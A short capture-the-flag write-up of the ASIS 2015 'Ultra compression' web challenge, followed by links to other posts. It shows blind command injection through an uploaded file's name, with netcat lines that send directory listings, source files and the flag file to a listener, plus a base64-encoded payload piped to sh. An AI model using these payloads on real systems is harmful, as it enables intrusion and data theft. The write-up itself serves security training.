ASIS 2015 Finals: Ultra compression (web125)

Reading time ~1 minute

This challenge was solved by and the write up was written by teammates, nguyen and akg

Through testing to know it’s a blind cmd injection in filename of a file upload.

Set a host listen to a port and inject a cmd, ex: filename.txt; ls |nc ip port

To copy the source, find .. -iname '*gz'|xargs cat|nc ip port, analyze it, we have expl:

~  echo "cat /home/asis/flag.txt | nc ip port" | base64
<base64string>
~ a.txt| echo <base64string> | base64 -d | sh
ASIS{72a126946e40f67a04d926dd4786ff15}

HITCON CTF 2019 Quals: Reverse - EmojiVM

This challenge was a VM implemented where every instruction was an emoji. For the first part of the challenge we had to reverse a flag ch...… Continue reading

HITCON CTF 2019 Quals: Reverse - CoreDumb

Published on October 19, 2019

HITCON CTF 2019 Quals: Pwn - Crypto in the shell

Published on October 19, 2019